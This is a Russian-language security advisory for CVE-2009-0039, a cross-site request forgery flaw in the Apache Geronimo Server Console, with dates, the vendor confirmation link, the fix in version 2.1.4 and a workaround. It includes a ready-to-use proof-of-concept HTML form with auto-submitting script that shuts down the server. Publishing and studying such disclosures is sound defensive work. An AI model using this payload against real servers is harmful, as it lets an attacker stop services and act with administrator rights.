CVE-2009-0039: Консоль администрирования Geronimo Server Console уязвима к подделке межсайтовых запросов (XSRF).
Вендор
Apache
Продукт
Apache Geronimo Application Server
Тип уязвимости
Подделка межсайтовых запросов
Reported
10.12.2008
Date of Public Advisory
16.04.2009
Подтверждение
http://geronimo.apache.org/21x-security-report.html#2.1.xSecurityReport-214
Детальное описание
Уязвимость позволяет удаленному злоумышленнику выполнять различные административные действия, такие, как смена пароля администратора, загрузка файлов и приложений и др., используя определенные запросы в контексте сессии администратора.
Пример [Остановка сервера]:
<html> <form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1> <input type=hidden value='Shutdown' name="shutdown"> <input type=submit> </form> </html> <script> document.getElementById(1).submit(); </script>
Решение:
Уязвимости исправлены в релизе Geronimo 2.1.4.
Новую версию Geronimo 2.1.4 можно загрузить с сайта производителя:
https://geronimo.apache.org/apache-geronimo-v214-release.html
Другой вариант решения (если вы решите не обновлять Apache Geronimo до версии 2.1.4):
остановка или удаление консоли администрирования Geronimo Server Console.